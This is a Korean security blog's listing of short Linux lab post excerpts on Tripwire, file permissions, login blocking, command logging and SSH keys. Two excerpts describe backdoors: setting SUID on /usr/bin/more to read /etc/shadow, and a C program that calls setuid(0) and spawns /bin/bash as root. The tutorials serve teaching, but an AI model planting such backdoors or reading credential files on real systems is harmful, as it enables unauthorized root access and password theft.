InfoSec

Linux 무결성 점검 도구 설치

Tripwire 설치 및 사용하기Tripwire는 현재 리눅스의 상태를 저장해차이점이 생길 경우 보고, 관리해주는 프로그램입니다.dnf install -y epel-releasednf install -y tripwire /usr/sbin/tripwire-setup-keyfiles Enter the site keyfile passphrase: 첫번째 암호 생성Enter the local keyfile passphrase: 두번째 암호 생성 Please enter your site passphrase: 첫번째 암호 입력Please enter your site passphrase: 첫번째 암호 입력 # config파일을 생성 및 정책파일 사인을 위해 위해 site keyfile을 두번 물어봅니다. mv /et..

2024. 6. 28. 16:55
InfoSec

리눅스 명령어 접근권한 변경하기 (백도어)

ls -l /user/bin/moremore 명령어 파일은 권한 755  chmod 4755 /usr/bin/morels -ls /usr/bin/more   유저로 로그인 한 후cat /etc/shadow more /etc/shadow /etc/shadow 파일은 관리자 계정만 접근이 가능한 파일입니다.cat 명령어로는 접근이 불가능하지만권한을 바꿔버린 more 명령으로는 접근이 가능한 것을 확인할 수 있습니다.   소유자소유자/그룹/기타계정권한3비트/3비트/3비트읽기/쓰기/접근  파일 소유자 변경하기chown 사용자.그룹 파일명

2024. 6. 28. 15:04
InfoSec

리눅스 유저 로그인을 금지시키는 8가지 방법

로그인 정책로컬로그인원격 접속루트에서전환1/etc/passwd 파일의 계정명 앞에 *표시로 주석처리차단차단불가2passwd -l 명령으로 로그인을 금지차단차단허용3/etc/passwd 파일의 로그인쉘을 /bin/false로 설정차단차단불가4/etc/passwd 파일의 로그인쉘을 /bin/nologin으로 설정차단차단불가5usermod -L 명령으로 로그인을 금지차단차단허용6chage 명령으로 사용자의 패스워드를 만료시키기차단차단허용7PAM을 이용한 로그인 금지차단허용허용8/etc/shadow 파일의 두번째 필드 앞에 !!를 표시하기차단차단허용  1.  /etc/passwd 파일의 계정명 앞에 *표시로 주석처리gedit /etc/passwd   로컬 로그인 : 불가능  원격 접속 : 차단  2. passw..

2024. 6. 28. 11:49
InfoSec

리눅스 백도어 루트 로그인 파일 만들기

C언어 컴파일러 설치하기dnf install -y gcc 현재 상황유저가 관리자 암호를 우연히 알게 되었다.이 유저는 관리자 권한으로 백도어 파일을 생성한 후차후에 관리자 권한을 이용하여 시스템을 해킹하고자 한다.  특정 파일을 실행하면 현재 계정을 루트로 변경시키기(관리자로 로그인한 상태에서)cd /home/유저명find / -user root -perm -4000 > root_perm.txt# 유저명이 root이며 권한이 4000으로 되어있는 파일을 찾아# root_perm.txt 파일에 목록을 저장합니다.gedit backdoor.c #include main(){ setuid(0); setgid(0); system("/bin/bash");}    # 현재 사용자의 uid와 gid를 0(r..

2024. 6. 27. 17:52
InfoSec

리눅스 사용자 로그인 기록 추적하기

1. 로그 저장 디렉터리 생성/backup/user_command mkdir -p /backup/user_commandtree /backup 2. 로그 파일에 퍼미션(권한 부여)숫자 777첫번째 숫자 => 파일이나 폴더의 소유자를 의미두번째 숫자 => 파일이나 폴더의 그룹을 의미세번째 숫자 => 소유자 & 그룹이 아닌 계정 권한을 변경하는 명령어 : chmod (Change Modify)chmod 777 /backup/user_command/  3. 로그 자동추적 구문 작성gedit /etc/profile 마지막 라인에 구문 추가 작성# User Monitoring USER=`who am i | awk '{print $1}'` TTY=`tty` if [ -n $TTY ] ; then          WH..

2024. 6. 27. 17:03
InfoSec

SSH

SSH 동작순서1) 클라이언트가 서버에 접속2) 서버가 인증키를 제시하고 클라이언트는 yes를 입력하여 인증키 받기3) 유저암호를 입력하여 로그인4) 서버에서 로그아웃5) 서버에 SSH로 재접속6) 유저암호를 입력하여 로그인 클라이언트 인증키를 사용하여 암호없이 서버에 접속하기1) 클라이언트가 인증키를 생성합니다.[user10@R92-53 ~]# ssh-keygen 생성된 인증키는 사용자 홈디렉터리내의 .ssh디렉터리에 생성됩니다. [user10@R92-53 ~]#  cd ~/.ssh [user10@R92-53 .ssh]# ls     id_rsa             id_rsa.pub# 두 개의 파일이 존재하는지 확인!2) 생성된 인증키를 서버의 클라이언트 홈 디렉터리로 전송합니다. [user10@R..

2024. 6. 26. 17:03